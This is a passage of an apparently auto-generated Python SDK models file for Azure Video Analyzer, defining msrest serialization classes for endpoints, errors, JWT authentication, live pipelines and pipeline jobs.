"SingleLayer_540p_H264_AAC", "SingleLayer_720p_H264_AAC", "SingleLayer_1080p_H264_AAC",
"SingleLayer_2160p_H264_AAC".
:type name: str or ~video_analyzer.models.EncoderSystemPresetType
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EncoderSystemPreset, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderSystemPreset' # type: str
self.name = kwargs['name']
class Endpoint(msrest.serialization.Model):
"""The endpoint details.
All required parameters must be populated in order to send to Azure.
:param endpoint_url: The URL of the endpoint.
:type endpoint_url: str
:param type: Required. The type of the endpoint. Possible values include: "ClientApi".
:type type: str or ~video_analyzer.models.VideoAnalyzerEndpointType
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'endpoint_url': {'key': 'endpointUrl', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Endpoint, self).__init__(**kwargs)
self.endpoint_url = kwargs.get('endpoint_url', None)
self.type = kwargs['type']
class EndpointBase(msrest.serialization.Model):
"""Base class for endpoints.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: TlsEndpoint, UnsecuredEndpoint.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.TlsEndpoint': 'TlsEndpoint', '#Microsoft.VideoAnalyzer.UnsecuredEndpoint': 'UnsecuredEndpoint'}
}
def __init__(
self,
**kwargs
):
super(EndpointBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.credentials = kwargs['credentials']
self.url = kwargs['url']
self.tunnel = kwargs.get('tunnel', None)
class ErrorAdditionalInfo(msrest.serialization.Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: any
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(ErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class ErrorDetail(msrest.serialization.Model):
"""The error detail.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details: list[~video_analyzer.models.ErrorDetail]
:ivar additional_info: The error additional info.
:vartype additional_info: list[~video_analyzer.models.ErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorDetail]'},
'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
}
def __init__(
self,
**kwargs
):
super(ErrorDetail, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class ErrorResponse(msrest.serialization.Model):
"""Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.).
:param error: The error object.
:type error: ~video_analyzer.models.ErrorDetail
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.error = kwargs.get('error', None)
class GroupLevelAccessControl(msrest.serialization.Model):
"""Group level network access control.
:param public_network_access: Whether or not public network access is allowed for specified
resources under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
"""
_attribute_map = {
'public_network_access': {'key': 'publicNetworkAccess', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(GroupLevelAccessControl, self).__init__(**kwargs)
self.public_network_access = kwargs.get('public_network_access', None)
class IotHub(msrest.serialization.Model):
"""The IoT Hub details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param id: Required. The IoT Hub resource identifier.
:type id: str
:param identity: Required. The IoT Hub identity.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the Iot Hub mapping.
:vartype status: str
"""
_validation = {
'id': {'required': True},
'identity': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(IotHub, self).__init__(**kwargs)
self.id = kwargs['id']
self.identity = kwargs['identity']
self.status = None
class JwtAuthentication(AuthenticationBase):
"""Properties for access validation based on JSON Web Tokens (JWT).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param issuers: List of expected token issuers. Token issuer is valid if it matches at least
one of the given values.
:type issuers: list[str]
:param audiences: List of expected token audiences. Token audience is valid if it matches at
least one of the given values.
:type audiences: list[str]
:param claims: List of additional token claims to be validated. Token must contains all claims
and respective values for it to be valid.
:type claims: list[~video_analyzer.models.TokenClaim]
:param keys: List of keys which can be used to validate access tokens. Having multiple keys
allow for seamless key rotation of the token signing key. Token signature must match exactly
one key.
:type keys: list[~video_analyzer.models.TokenKey]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'issuers': {'key': 'issuers', 'type': '[str]'},
'audiences': {'key': 'audiences', 'type': '[str]'},
'claims': {'key': 'claims', 'type': '[TokenClaim]'},
'keys': {'key': 'keys', 'type': '[TokenKey]'},
}
def __init__(
self,
**kwargs
):
super(JwtAuthentication, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.JwtAuthentication' # type: str
self.issuers = kwargs.get('issuers', None)
self.audiences = kwargs.get('audiences', None)
self.claims = kwargs.get('claims', None)
self.keys = kwargs.get('keys', None)
class KeyVaultProperties(msrest.serialization.Model):
"""The details for accessing the encryption keys in Key Vault.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param key_identifier: Required. The URL of the Key Vault key used to encrypt the account. The
key may either be versioned (for example https://vault/keys/mykey/version1) or reference a key
without a version (for example https://vault/keys/mykey).
:type key_identifier: str
:ivar current_key_identifier: The current key used to encrypt Video Analyzer account, including
the key version.
:vartype current_key_identifier: str
"""
_validation = {
'key_identifier': {'required': True},
'current_key_identifier': {'readonly': True},
}
_attribute_map = {
'key_identifier': {'key': 'keyIdentifier', 'type': 'str'},
'current_key_identifier': {'key': 'currentKeyIdentifier', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(KeyVaultProperties, self).__init__(**kwargs)
self.key_identifier = kwargs['key_identifier']
self.current_key_identifier = None
class ListProvisioningTokenInput(msrest.serialization.Model):
"""The input parameters to generate registration token for the Azure Video Analyzer IoT edge module.
All required parameters must be populated in order to send to Azure.
:param expiration_date: Required. The desired expiration date of the registration token. The
Azure Video Analyzer IoT edge module must be initialized and connected to the Internet prior to
the token expiration date.
:type expiration_date: ~datetime.datetime
"""
_validation = {
'expiration_date': {'required': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(ListProvisioningTokenInput, self).__init__(**kwargs)
self.expiration_date = kwargs['expiration_date']
class LivePipeline(ProxyResource):
"""Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: The reference to an existing pipeline topology defined for real-time
content processing. When activated, this live pipeline will process content according to the
pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The
allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds
this capacity, then the service will disconnect temporarily from the camera. It will retry to
re-establish connection (with exponential backoff), checking to see if the camera bitrate is
now below the reserved capacity. Doing so will ensure that one 'noisy neighbor' does not affect
other live pipelines in your account.
:type bitrate_kbps: int
:ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive",
"Activating", "Active", "Deactivating".
:vartype state: str or ~video_analyzer.models.LivePipelineState
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameters values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can be optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'},
'state': {'key': 'properties.state', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(LivePipeline, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.state = None
self.parameters = kwargs.get('parameters', None)
class LivePipelineCollection(msrest.serialization.Model):
"""A collection of LivePipeline items.
:param value: A collection of LivePipeline items.
:type value: list[~video_analyzer.models.LivePipeline]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[LivePipeline]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class LivePipelineOperationStatus(msrest.serialization.Model):
"""Used for tracking the status of an operation on the live pipeline.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the live pipeline operation.
:vartype name: str
:ivar status: The status of the live pipeline operation.
:vartype status: str
:ivar error: The error details for the live pipeline operation.
:vartype error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'readonly': True},
'status': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineOperationStatus, self).__init__(**kwargs)
self.name = None
self.status = None
self.error = None
class LivePipelineUpdate(ProxyResource):
"""Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: The reference to an existing pipeline topology defined for real-time
content processing. When activated, this live pipeline will process content according to the
pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The
allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds
this capacity, then the service will disconnect temporarily from the camera. It will retry to
re-establish connection (with exponential backoff), checking to see if the camera bitrate is
now below the reserved capacity. Doing so will ensure that one 'noisy neighbor' does not affect
other live pipelines in your account.
:type bitrate_kbps: int
:ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive",
"Activating", "Active", "Deactivating".
:vartype state: str or ~video_analyzer.models.LivePipelineState
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameters values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can be optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'},
'state': {'key': 'properties.state', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineUpdate, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.state = None
self.parameters = kwargs.get('parameters', None)
class LogSpecification(msrest.serialization.Model):
"""A diagnostic log emitted by service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The diagnostic log category name.
:vartype name: str
:ivar display_name: The diagnostic log category display name.
:vartype display_name: str
:ivar blob_duration: The time range for requests in each blob.
:vartype blob_duration: str
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'blob_duration': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'blob_duration': {'key': 'blobDuration', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LogSpecification, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.blob_duration = None
class MetricDimension(msrest.serialization.Model):
"""A metric dimension.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The metric dimension name.
:vartype name: str
:ivar display_name: The display name for the dimension.
:vartype display_name: str
:ivar to_be_exported_for_shoebox: Whether to export metric to shoebox.
:vartype to_be_exported_for_shoebox: bool
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'to_be_exported_for_shoebox': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'to_be_exported_for_shoebox': {'key': 'toBeExportedForShoebox', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(MetricDimension, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.to_be_exported_for_shoebox = None
class MetricSpecification(msrest.serialization.Model):
"""A metric emitted by service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The metric name.
:vartype name: str
:ivar display_name: The metric display name.
:vartype display_name: str
:ivar display_description: The metric display description.
:vartype display_description: str
:ivar unit: The metric unit. Possible values include: "Bytes", "Count", "Milliseconds".
:vartype unit: str or ~video_analyzer.models.MetricUnit
:ivar aggregation_type: The metric aggregation type. Possible values include: "Average",
"Count", "Total".
:vartype aggregation_type: str or ~video_analyzer.models.MetricAggregationType
:ivar lock_aggregation_type: The metric lock aggregation type. Possible values include:
"Average", "Count", "Total".
:vartype lock_aggregation_type: str or ~video_analyzer.models.MetricAggregationType
:param supported_aggregation_types: Supported aggregation types.
:type supported_aggregation_types: list[str]
:ivar dimensions: The metric dimensions.
:vartype dimensions: list[~video_analyzer.models.MetricDimension]
:ivar enable_regional_mdm_account: Indicates whether regional MDM account is enabled.
:vartype enable_regional_mdm_account: bool
:ivar source_mdm_account: The source MDM account.
:vartype source_mdm_account: str
:ivar source_mdm_namespace: The source MDM namespace.
:vartype source_mdm_namespace: str
:ivar supported_time_grain_types: The supported time grain types.
:vartype supported_time_grain_types: list[str]
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'display_description': {'readonly': True},
'unit': {'readonly': True},
'aggregation_type': {'readonly': True},
'lock_aggregation_type': {'readonly': True},
'dimensions': {'readonly': True},
'enable_regional_mdm_account': {'readonly': True},
'source_mdm_account': {'readonly': True},
'source_mdm_namespace': {'readonly': True},
'supported_time_grain_types': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'display_description': {'key': 'displayDescription', 'type': 'str'},
'unit': {'key': 'unit', 'type': 'str'},
'aggregation_type': {'key': 'aggregationType', 'type': 'str'},
'lock_aggregation_type': {'key': 'lockAggregationType', 'type': 'str'},
'supported_aggregation_types': {'key': 'supportedAggregationTypes', 'type': '[str]'},
'dimensions': {'key': 'dimensions', 'type': '[MetricDimension]'},
'enable_regional_mdm_account': {'key': 'enableRegionalMdmAccount', 'type': 'bool'},
'source_mdm_account': {'key': 'sourceMdmAccount', 'type': 'str'},
'source_mdm_namespace': {'key': 'sourceMdmNamespace', 'type': 'str'},
'supported_time_grain_types': {'key': 'supportedTimeGrainTypes', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(MetricSpecification, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.display_description = None
self.unit = None
self.aggregation_type = None
self.lock_aggregation_type = None
self.supported_aggregation_types = kwargs.get('supported_aggregation_types', None)
self.dimensions = None
self.enable_regional_mdm_account = None
self.source_mdm_account = None
self.source_mdm_namespace = None
self.supported_time_grain_types = None
class NetworkAccessControl(msrest.serialization.Model):
"""Network access control for video analyzer account.
:param integration: Public network access for integration group.
:type integration: ~video_analyzer.models.GroupLevelAccessControl
:param ingestion: Public network access for ingestion group.
:type ingestion: ~video_analyzer.models.GroupLevelAccessControl
:param consumption: Public network access for consumption group.
:type consumption: ~video_analyzer.models.GroupLevelAccessControl
"""
_attribute_map = {
'integration': {'key': 'integration', 'type': 'GroupLevelAccessControl'},
'ingestion': {'key': 'ingestion', 'type': 'GroupLevelAccessControl'},
'consumption': {'key': 'consumption', 'type': 'GroupLevelAccessControl'},
}
def __init__(
self,
**kwargs
):
super(NetworkAccessControl, self).__init__(**kwargs)
self.integration = kwargs.get('integration', None)
self.ingestion = kwargs.get('ingestion', None)
self.consumption = kwargs.get('consumption', None)
class NodeInput(msrest.serialization.Model):
"""Describes an input signal to be used on a pipeline node.
All required parameters must be populated in order to send to Azure.
:param node_name: Required. The name of the upstream node in the pipeline which output is used
as input of the current node.
:type node_name: str
"""
_validation = {
'node_name': {'required': True},
}
_attribute_map = {
'node_name': {'key': 'nodeName', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(NodeInput, self).__init__(**kwargs)
self.node_name = kwargs['node_name']
class Operation(msrest.serialization.Model):
"""An operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. The operation name.
:type name: str
:param display: The operation display name.
:type display: ~video_analyzer.models.OperationDisplay
:param origin: Origin of the operation.
:type origin: str
:param properties: Operation properties format.
:type properties: ~video_analyzer.models.Properties
:param is_data_action: Whether the operation applies to data-plane.
:type is_data_action: bool
:param action_type: Indicates the action type. Possible values include: "Internal".
:type action_type: str or ~video_analyzer.models.ActionType
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
'origin': {'key': 'origin', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'Properties'},
'is_data_action': {'key': 'isDataAction', 'type': 'bool'},
'action_type': {'key': 'actionType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.name = kwargs['name']
self.display = kwargs.get('display', None)
self.origin = kwargs.get('origin', None)
self.properties = kwargs.get('properties', None)
self.is_data_action = kwargs.get('is_data_action', None)
self.action_type = kwargs.get('action_type', None)
class OperationCollection(msrest.serialization.Model):
"""A collection of Operation items.
:param value: A collection of Operation items.
:type value: list[~video_analyzer.models.Operation]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Operation]'},
}
def __init__(
self,
**kwargs
):
super(OperationCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class OperationDisplay(msrest.serialization.Model):
"""Operation details.
:param provider: The service provider.
:type provider: str
:param resource: Resource on which the operation is performed.
:type resource: str
:param operation: The operation type.
:type operation: str
:param description: The operation description.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(OperationDisplay, self).__init__(**kwargs)
self.provider = kwargs.get('provider', None)
self.resource = kwargs.get('resource', None)
self.operation = kwargs.get('operation', None)
self.description = kwargs.get('description', None)
class ParameterDeclaration(msrest.serialization.Model):
"""Single topology parameter declaration. Declared parameters can and must be referenced throughout the topology and can optionally have default values to be used when they are not defined in the pipelines.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the parameter.
:type name: str
:param type: Required. Type of the parameter. Possible values include: "String",
"SecretString", "Int", "Double", "Bool".
:type type: str or ~video_analyzer.models.ParameterType
:param description: Description of the parameter.
:type description: str
:param default: The default value for the parameter to be used if the pipeline does not specify
a value.
:type default: str
"""
_validation = {
'name': {'required': True},
'type': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'default': {'key': 'default', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ParameterDeclaration, self).__init__(**kwargs)
self.name = kwargs['name']
self.type = kwargs['type']
self.description = kwargs.get('description', None)
self.default = kwargs.get('default', None)
class ParameterDefinition(msrest.serialization.Model):
"""Defines the parameter value of an specific pipeline topology parameter. See pipeline topology parameters for more information.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the parameter declared in the pipeline topology.
:type name: str
:param value: Parameter value to be applied on this specific pipeline.
:type value: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ParameterDefinition, self).__init__(**kwargs)
self.name = kwargs['name']
self.value = kwargs.get('value', None)
class PemCertificateList(CertificateSource):
"""A list of PEM formatted certificates.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param certificates: Required. PEM formatted public certificates. One certificate per entry.
:type certificates: list[str]
"""
_validation = {
'type': {'required': True},
'certificates': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'certificates': {'key': 'certificates', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PemCertificateList, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.PemCertificateList' # type: str
self.certificates = kwargs['certificates']
class PipelineJob(ProxyResource):
"""Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: Reference to an existing pipeline topology. When activated, this pipeline
job will process content according to the pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:ivar state: Current state of the pipeline (read-only). Possible values include: "Processing",
"Canceled", "Completed", "Failed".
:vartype state: str or ~video_analyzer.models.PipelineJobState
:ivar expiration: The date-time by when this pipeline job will be automatically deleted from
your account.
:vartype expiration: ~datetime.datetime
:ivar error: Details about the error, in case the pipeline job fails.
:vartype error: ~video_analyzer.models.PipelineJobError
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameters values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can be optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
'expiration': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'state': {'key': 'properties.state', 'type': 'str'},
'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'},
'error': {'key': 'properties.error', 'type': 'PipelineJobError'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(PipelineJob, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.state = None
self.expiration = None
self.error = None
self.parameters = kwargs.get('parameters', None)
class PipelineJobCollection(msrest.serialization.Model):
"""A collection of PipelineJob items.
:param value: A collection of PipelineJob items.
:type value: list[~video_analyzer.models.PipelineJob]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PipelineJob]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class PipelineJobError(msrest.serialization.Model):
"""Details about the error for a failed pipeline job.
:param code: The error code.
:type code: str
:param message: The error message.
:type message: str
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobError, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class PipelineJobOperationStatus(msrest.serialization.Model):
"""Used for tracking the status of an operation on the pipeline job.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the pipeline job operation.
:vartype name: str
:ivar status: The status of the pipeline job operation.
:vartype status: str
:ivar error: The error details for the pipeline job operation.
:vartype error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'readonly': True},
'status': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobOperationStatus, self).__init__(**kwargs)
self.name = None
self.status = None
self.error = None
class PipelineJobUpdate(ProxyResource):
"""Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: Reference to an existing pipeline topology. When activated, this pipeline
job will process content according to the pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:ivar state: Current state of the pipeline (read-only). Possible values include: "Processing",
"Canceled", "Completed", "Failed".
:vartype state: str or ~video_analyzer.models.PipelineJobState
:ivar expiration: The date-time by when this pipeline job will be automatically deleted from
your account.
:vartype expiration: ~datetime.datetime
:ivar error: Details about the error, in case the pipeline job fails.
:vartype error: ~video_analyzer.models.PipelineJobError
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameters values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can be optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
